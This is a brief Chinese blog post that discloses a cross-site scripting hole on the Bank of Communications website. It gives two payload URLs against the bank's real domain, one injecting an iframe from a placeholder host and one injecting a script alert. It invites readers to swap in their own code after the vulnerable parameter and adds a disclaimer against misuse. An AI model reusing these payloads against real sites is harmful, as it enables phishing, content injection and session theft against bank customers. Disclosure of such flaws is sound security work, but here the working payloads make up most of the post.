交通银行网页存在跨站漏洞
交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题,以下是测试过程,广大朋友不要利用此代码干坏事,那样是要负法律责任的,估计bug很快被修复
提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<*iframe*%20src=http://www.XXXX.cn><*/iframe*>
提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<*script*>alert(“吓小MM用的”)<*/script*>
其他的不演示了
把上面URL中业务推荐后的代码换成你的即可
作者:desireboy
发表评论
| Trackback